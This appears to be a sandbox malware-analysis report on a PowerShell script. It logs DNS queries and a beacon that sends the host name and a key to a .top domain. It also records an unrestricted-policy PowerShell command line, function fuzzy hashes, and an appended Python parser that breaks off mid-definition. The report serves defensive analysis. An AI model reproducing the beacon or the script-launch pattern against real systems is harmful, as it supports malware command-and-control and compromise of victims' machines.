Jan 7, 2025 14:34:08.748343945 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.748353958 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.748363018 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.748408079 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.754743099 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.754797935 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.754806042 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.754816055 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.754844904 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.754878044 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.760953903 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.760962963 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.761010885 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
Jan 7, 2025 14:34:08.761043072 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.761051893 CET | 80          | 49711     | 142.250.184.228 | 192.168.2.6
Jan 7, 2025 14:34:08.761079073 CET | 49711       | 80        | 192.168.2.6     | 142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.767287970 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.767297983 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.767338991 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.767365932 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.767374039 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.767410040 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:08.773689032 CET8049711142.250.184.228192.168.2.6
                                                                                            Jan 7, 2025 14:34:08.775569916 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:09.191668034 CET4971180192.168.2.6142.250.184.228
                                                                                            Jan 7, 2025 14:34:09.191936016 CET4971080192.168.2.645.61.136.138
Timestamp                          | Source Port | Dest Port | Source IP   | Dest IP
Jan 7, 2025 14:34:06.569744110 CET | 57885       | 53        | 192.168.2.6 | 1.1.1.1
Jan 7, 2025 14:34:06.950231075 CET | 53          | 57885     | 1.1.1.1     | 192.168.2.6
Jan 7, 2025 14:34:07.882790089 CET | 62447       | 53        | 192.168.2.6 | 1.1.1.1
Jan 7, 2025 14:34:07.890132904 CET | 53          | 62447     | 1.1.1.1     | 192.168.2.6

Timestamp                          | Source IP   | Dest IP | Trans ID | OP Code            | Name                | Type           | Class       | DNS over HTTPS
Jan 7, 2025 14:34:06.569744110 CET | 192.168.2.6 | 1.1.1.1 | 0x960d   | Standard query (0) | jjdgdeffjimfgne.top | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:34:07.882790089 CET | 192.168.2.6 | 1.1.1.1 | 0x8d98   | Standard query (0) | www.google.com      | A (IP address) | IN (0x0001) | false

Timestamp                          | Source IP | Dest IP     | Trans ID | Reply Code   | Name                | CName | Address         | Type           | Class       | DNS over HTTPS
Jan 7, 2025 14:34:06.950231075 CET | 1.1.1.1   | 192.168.2.6 | 0x960d   | No error (0) | jjdgdeffjimfgne.top |       | 45.61.136.138   | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:34:07.890132904 CET | 1.1.1.1   | 192.168.2.6 | 0x8d98   | No error (0) | www.google.com      |       | 142.250.184.228 | A (IP address) | IN (0x0001) | false

• jjdgdeffjimfgne.top
• www.google.com
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.6 | 49710       | 45.61.136.138  | 80               | 5032 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                          | Bytes transferred | Direction | Data
Jan 7, 2025 14:34:06.971807003 CET | 219               | OUT       | GET /4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: jjdgdeffjimfgne.top
    Connection: Keep-Alive
Jan 7, 2025 14:34:07.881592989 CET | 166               | IN        | HTTP/1.1 302 Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 07 Jan 2025 13:34:07 GMT
    Content-Length: 0
    Connection: keep-alive
    Location: http://www.google.com


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
1          | 192.168.2.6 | 49711       | 142.250.184.228 | 80               | 5032 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                          | Bytes transferred | Direction | Data
Jan 7, 2025 14:34:07.897388935 CET | 159               | OUT       | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: www.google.com
    Connection: Keep-Alive
Jan 7, 2025 14:34:08.572280884 CET | 1236              | IN        | HTTP/1.1 200 OK
    Date: Tue, 07 Jan 2025 13:34:08 GMT
    Expires: -1
    Cache-Control: private, max-age=0
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-bTruN53NTWSnIKw-k4Mkeg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Server: gws
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AZ6Zc-Wi2aiGyXAIiDKpvWjVhwEwy-KtMxQXFCtvPxnnrIRTZFgkLO4UCYM; expires=Sun, 06-Jul-2025 13:34:08 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
    Set-Cookie: NID=520=IsTjCglPKOLjpssG3Eh7EjYiVM2px1Tv2Ba0nHi0_pm8uN7OihyUy95NleU7IHNrk-xc1_o-VPMDj3f1Bgm4FYvcxTp4suFieitnZlLl2TEyT1Zm6jvBBVBUbXKAQMhYqwihrSlGcXYFHVUsJW2XBtdkNiOJPQFJziEiWY21PLmY6iktpDD3ma6k7WWhG01nVEJiZ7t79w; expires=Wed, 09-Jul-2025 13:34:08 GMT; path=/; domain=.google.com; HttpOnly
    Accept-Ranges: none
    Vary: Accept-Encoding
    Transfer-Encoding: chunked


Target ID: 0
Start time: 08:34:01
Start date: 07/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 08:34:01
Start date: 07/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                              • Instruction ID: f7c788a9f04f729a16aa83bae9f845cf5103f7b7d607ed2c8174ab9f4bf9d8ec
                                                                                              • Opcode Fuzzy Hash: 23874b88b2de04fcc78ece90b7f233dda41669d816ba679b6f71f60a33b83207
                                                                                              • Instruction Fuzzy Hash: C5020930A18A4D8FDB95DF5CC4A1AA9BBE1FF5A310F14417AD449D72A6CA38FC42C781
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 146de4b2793d080ec2f82388efeb6dd8d4f5c3ca5a90c0d310a262c6d1d67d94
                                                                                              • Instruction ID: a90f7f8e50e628dcc085b6c46d84f64bfd57b4570868c7f59b8a38916a253350
                                                                                              • Opcode Fuzzy Hash: 146de4b2793d080ec2f82388efeb6dd8d4f5c3ca5a90c0d310a262c6d1d67d94
                                                                                              • Instruction Fuzzy Hash: 12F0A03590D78C8FCB55EF2888694E97FE0FF66310B04029BE948C7061DB259948CBC2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 643de03259ac2d59ca9c282d439375bda3ea10465dd5c0f1d5fc86bef8bf2101
                                                                                              • Instruction ID: 4e235974a852828881c34d8aee56f7bfbbf8a721a17e278232025e9408058e92
                                                                                              • Opcode Fuzzy Hash: 643de03259ac2d59ca9c282d439375bda3ea10465dd5c0f1d5fc86bef8bf2101
                                                                                              • Instruction Fuzzy Hash: 7B31F23191CB489FDB189F5C984A6A97BE0FBA9310F00426FE049C3292DB74A855CBC2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 96353ee003e2e111375fd4992139db3a9d146694ba9a0e770d6f4db22f96f477
                                                                                              • Instruction ID: c09e702a66af250756b9b4d069c93127b10262f0697a40ab60d6e6ff6485b9c3
                                                                                              • Opcode Fuzzy Hash: 96353ee003e2e111375fd4992139db3a9d146694ba9a0e770d6f4db22f96f477
                                                                                              • Instruction Fuzzy Hash: 4F210330A0CB4C8FDB58DF9C98897E97BE0EB96321F04826FD409C3152D7749846CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 717020ee0462c59848616130b9967344714d99e22fe0557291d1be51e29d7a20
                                                                                              • Instruction ID: 8c76bcc6c5e4e4846a2f9bea4dcb1a5c33c4b191af02f9705e4cc4bf23800ee2
                                                                                              • Opcode Fuzzy Hash: 717020ee0462c59848616130b9967344714d99e22fe0557291d1be51e29d7a20
                                                                                              • Instruction Fuzzy Hash: BB313E30A1A94D8EFBB49F14CC69BF93291FF47319F400639D51DC6092CA3C6985DA11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5ef20a273488680844466aae72d4dfae85443a4d99ab85de7be8fbdac6cbbffc
                                                                                              • Instruction ID: e0bf69237d34b19679a2af32533bb9d89f8df4d78890bc7dd54be8b80e359ba9
                                                                                              • Opcode Fuzzy Hash: 5ef20a273488680844466aae72d4dfae85443a4d99ab85de7be8fbdac6cbbffc
                                                                                              • Instruction Fuzzy Hash: 8C01A73020CB0C4FDB44EF4CE451AA5B3E0FB99320F10052EE58AC3651D636E881CB41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2230296034.00007FFD34B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd34b70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 96f36de7433c5c4c6f3f6995058ee1744a2678ea3c9161bb5eadd23a7ddd4d2b
                                                                                              • Instruction ID: a7cebcd0a26722fe1e753919f8486329429da29f8ce625986149cf46ae1adaaf
                                                                                              • Opcode Fuzzy Hash: 96f36de7433c5c4c6f3f6995058ee1744a2678ea3c9161bb5eadd23a7ddd4d2b
                                                                                              • Instruction Fuzzy Hash: E7F0F032B0D5048FDB58EB5CE8918A43BE0FF06320B1440B6E10CCB1A7CA2AFC01CB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2230296034.00007FFD34B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd34b70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 75ce007fbde22acf30292098d40dee26aaf8d69e08b35e26ce20ed55b17288fd
                                                                                              • Instruction ID: 8d47275c8ed6f6549786481eaf73ac834ec005b3dec23253f5371c67108353be
                                                                                              • Opcode Fuzzy Hash: 75ce007fbde22acf30292098d40dee26aaf8d69e08b35e26ce20ed55b17288fd
                                                                                              • Instruction Fuzzy Hash: C8F0B431B4D5458FDB54EB4CE4914E877E0FF0632070440B6E10DCB1A3CA2AEC44C761
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2230296034.00007FFD34B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd34b70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e29dde9fdd98ed4ef0f1f928df5f9b2252af0765bd205a4f48ca58823babdc18
                                                                                              • Instruction ID: f3744e0144c5cd710311a341cbe72643d17f68df88b71d4645c77b4e6003500d
                                                                                              • Opcode Fuzzy Hash: e29dde9fdd98ed4ef0f1f928df5f9b2252af0765bd205a4f48ca58823babdc18
                                                                                              • Instruction Fuzzy Hash: 60F0303171CF044FE748EE2DE4496A6B7E1FBA8355F10462FE44AC3651DB25E8818786
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K_^$K_^$K_^$K_^
                                                                                              • API String ID: 0-4267328068
                                                                                              • Opcode ID: 35be13763df9e252968105d9ce51687ecbff3ecb9ab112651dab47c08ddc7af6
                                                                                              • Instruction ID: f8927c1f552a38f38adf5b1e22fd2a1ec6919e82ddf4a3901b9e8388733ae645
                                                                                              • Opcode Fuzzy Hash: 35be13763df9e252968105d9ce51687ecbff3ecb9ab112651dab47c08ddc7af6
                                                                                              • Instruction Fuzzy Hash: 8071C356A4DAC25FF762433809FA0DAABD4EF1332570915F7C698C7093EE1D2C07A646
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: YK_I$ZK_I
                                                                                              • API String ID: 0-1876443982
                                                                                              • Opcode ID: e8909de0d66ab03e935c33f857a2eb4058a0cbaf959d29b347d5b09e349338fb
                                                                                              • Instruction ID: 38ba59e6e53754df5f6402630d3dccd4dc28efcf683d3cacb54103d5c96ca960
                                                                                              • Opcode Fuzzy Hash: e8909de0d66ab03e935c33f857a2eb4058a0cbaf959d29b347d5b09e349338fb
                                                                                              • Instruction Fuzzy Hash: 5342F853B0E5911BF32567FD79B10FD9B64EF8233470C53F7D2889B09BA828B8468295
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4$K_^
                                                                                              • API String ID: 0-150298877
                                                                                              • Opcode ID: 4596f6016ebf5f4550cbeffae6ede8c1124e30f15807cb6efae24d38a9779743
                                                                                              • Instruction ID: a91198b5975a234eb7821efb637b51f752548129df4e988875aea8ba287a2bde
                                                                                              • Opcode Fuzzy Hash: 4596f6016ebf5f4550cbeffae6ede8c1124e30f15807cb6efae24d38a9779743
                                                                                              • Instruction Fuzzy Hash: 8A717556A0F7D21EFB93537C69F60E6BFA0DF5326470906B7C284CA093AD1C1C0BA661
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K
                                                                                              • API String ID: 0-856455061
                                                                                              • Opcode ID: f068c6697081f935e3802f010e21a28c961e0a20a29d7c1e1bc9af6f463bf95e
                                                                                              • Instruction ID: fffdfc07c84be6687c1019c86f3fe3adbade6821d866e627e97aaa4fb21f2ee7
                                                                                              • Opcode Fuzzy Hash: f068c6697081f935e3802f010e21a28c961e0a20a29d7c1e1bc9af6f463bf95e
                                                                                              • Instruction Fuzzy Hash: 78D19357A0F6D65FE712677C68F10E93B60DE5332870D02F7C6C48A093AD28684A97A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2227281373.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd34990000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 56700bbb91fc9cc0e386f301be937920cfa45ca4b673b94cecb0d6747eebb550
                                                                                              • Instruction ID: 544772ec075701aec4e8756cfaad7ea767ab19846dbb97c75a5fc6b28568f5d5
                                                                                              • Opcode Fuzzy Hash: 56700bbb91fc9cc0e386f301be937920cfa45ca4b673b94cecb0d6747eebb550
                                                                                              • Instruction Fuzzy Hash: 31723821B0DB854FDBAADE2C84A58643BE1EF6F31071901FEC589CB197D929EC46C391
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 29ccc7cc19c071a044078c8828b33fc887280d0220098e9e689096dcbb8e90f1
                                                                                              • Instruction ID: 54d54711cf9fa291248ec85a9af945aba2875d5aa2883dcb5c48c7bd88cf49ee
                                                                                              • Opcode Fuzzy Hash: 29ccc7cc19c071a044078c8828b33fc887280d0220098e9e689096dcbb8e90f1
                                                                                              • Instruction Fuzzy Hash: 4651A357A0DAC25FF712472C19EA0D9BBE0EF136A471911F7C595CB0A3EE0D2C079A91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ae2d86b5ab6c36ff339a2150a97a31ec3ff75b9629a0a9055a7a8d96f61c7570
                                                                                              • Instruction ID: 4877d85e9ec28fda7c51e41936c953c6a5548412e04c51d88ba259466ee7a023
                                                                                              • Opcode Fuzzy Hash: ae2d86b5ab6c36ff339a2150a97a31ec3ff75b9629a0a9055a7a8d96f61c7570
                                                                                              • Instruction Fuzzy Hash: D0A1C662B0EADA0FEB92977C58B91B5BBE0DF5722470901FBC188CB1A3DD1C6C468351
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c3b39f3777beb45e8ce19e179dceeac484465c769e55e3c2c3ccdd57e32426e6
• Instruction ID: 3283344b0585678a9c3563358b4b160b37a0d76a4046fdc5932935dd6aa24d56
• Opcode Fuzzy Hash: c3b39f3777beb45e8ce19e179dceeac484465c769e55e3c2c3ccdd57e32426e6
• Instruction Fuzzy Hash: 83614D27E0D6921FF713576CA9B60EA7FA0DF4326471A11F7C685CA0E3ED1D180AA261

Memory Dump Source
• Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f6b23900225d7115e260135b5f6f096d5b47927bb4e78891790602f88d2940dd
• Instruction ID: cc44e1a872615e0b0c3dc005870fe9a346bed32c658744489eba7bf5dc4efe22
• Opcode Fuzzy Hash: f6b23900225d7115e260135b5f6f096d5b47927bb4e78891790602f88d2940dd
• Instruction Fuzzy Hash: 0A518456B0F7D21EFA93536D69F50E6BFA0EF5326470906B7C295C6093AC0C180BB662

Memory Dump Source
• Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 13ea3b70d995d6ef8db4431ac09d94a7c0f1e6564c25ee9719a70959d58cbb6e
• Instruction ID: 25f5a8ebf9f4187363513edf89e035922eb5767c1dcab75a715796e11b3075dc
• Opcode Fuzzy Hash: 13ea3b70d995d6ef8db4431ac09d94a7c0f1e6564c25ee9719a70959d58cbb6e
• Instruction Fuzzy Hash: 55418467E0DAD66AF751532909FA0E9FFE0EF1326870901F3CA54CA093ED0D6D136941

Memory Dump Source
• Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c70286441274854b9843dda547cd78f71d44da83d664efd1f603fb3ab5fe3b6b
• Instruction ID: 31ee2d08a3d8ddff2bd8e5aeae45d61c1cd5eb3e42bcaa4e654d8e401b0d179b
• Opcode Fuzzy Hash: c70286441274854b9843dda547cd78f71d44da83d664efd1f603fb3ab5fe3b6b
• Instruction Fuzzy Hash: 0941D657A1DAC25EF712472C98E60DAEBE0FF13664B0911F3CE95C6093ED0D1C07AA92

Memory Dump Source
• Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a4f8b908d79225d74543417043f5fa321cdde1e4e7f0fbe1da1748879428b70c
• Instruction ID: 386ff81da83563b30708e8bb1a8b51c85fb10e1561ad09519b97a86e69a9ff36
• Opcode Fuzzy Hash: a4f8b908d79225d74543417043f5fa321cdde1e4e7f0fbe1da1748879428b70c
• Instruction Fuzzy Hash: E13195A7B0C6935BF211927CA9F70DA7BE0DF5337874902B3CA84C64A3AD1D78476191

Memory Dump Source
• Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 162f9931f015e1445345bb4c556c76daa631c57ce12b7ebfc64c9717d44cc200
• Instruction ID: de7d17e09ba68f6caa4bba17cc1d755de15b79380396675b5cd1a74053751ab2
• Opcode Fuzzy Hash: 162f9931f015e1445345bb4c556c76daa631c57ce12b7ebfc64c9717d44cc200
• Instruction Fuzzy Hash: 5731C387A0D7961AF6620B2C19FA4D9AFD4DF533B0B0A11B3C784DD4B3AD1C6C07A252

Memory Dump Source
• Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e9e492708bc8486ad3b9831420439b89b475153508778cac600ad6b042993568
• Instruction ID: 8795ccab5fd5bdedcacbe220692a816fe9313e7024784e327917eb57febc35ee
• Opcode Fuzzy Hash: e9e492708bc8486ad3b9831420439b89b475153508778cac600ad6b042993568
• Instruction Fuzzy Hash: DE217397A0D6D25BF252937C6DF60EA7FE4DE5327430911B3C6C4C60A3AD0D2C47A1A6
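The entries above are the per-function similarity records the Joe Sandbox IDA plugin emits for code in the 00007FFD348C0000 dump (flagged "based on PE: false"). An analyst clustering this sample against others pulls the fuzzy hashes out in bulk rather than reading them one by one. The Python below is an added example, not part of the report or of the Joe Sandbox tooling: it parses records in this layout into rows, lists which similarity fields a record leaves blank (API ID, String ID and API String ID are empty in every entry above), and summarizes the set. The two embedded sample records are copied verbatim from the entries above; the field names come from the report layout, and the invariant it checks (Opcode ID equal to Opcode Fuzzy Hash) is simply what holds in these records, not a documented property of the plugin.

```python
"""Bulk-extract Joe Sandbox IDA-plugin 'Similarity' records from report text.

Added example; not part of the report or of the Joe Sandbox tooling.
The record layout (labels, bullets, field names) is taken from the entries
above; the two SAMPLE records are copied from them verbatim.
"""
from collections import Counter
from typing import Dict, List

RECORD_START = "Memory Dump Source"
# Section labels that introduce groups of bullet fields; they carry no value.
SECTION_LABELS = {RECORD_START, "Joe Sandbox IDA Plugin", "Similarity"}

SAMPLE = """
Memory Dump Source
• Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f6b23900225d7115e260135b5f6f096d5b47927bb4e78891790602f88d2940dd
• Instruction ID: cc44e1a872615e0b0c3dc005870fe9a346bed32c658744489eba7bf5dc4efe22
• Opcode Fuzzy Hash: f6b23900225d7115e260135b5f6f096d5b47927bb4e78891790602f88d2940dd
• Instruction Fuzzy Hash: 0A518456B0F7D21EFA93536D69F50E6BFA0EF5326470906B7C295C6093AC0C180BB662
Memory Dump Source
• Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 13ea3b70d995d6ef8db4431ac09d94a7c0f1e6564c25ee9719a70959d58cbb6e
• Instruction ID: 25f5a8ebf9f4187363513edf89e035922eb5767c1dcab75a715796e11b3075dc
• Opcode Fuzzy Hash: 13ea3b70d995d6ef8db4431ac09d94a7c0f1e6564c25ee9719a70959d58cbb6e
• Instruction Fuzzy Hash: 55418467E0DAD66AF751532909FA0E9FFE0EF1326870901F3CA54CA093ED0D6D136941
"""


def parse_records(text: str) -> List[Dict[str, str]]:
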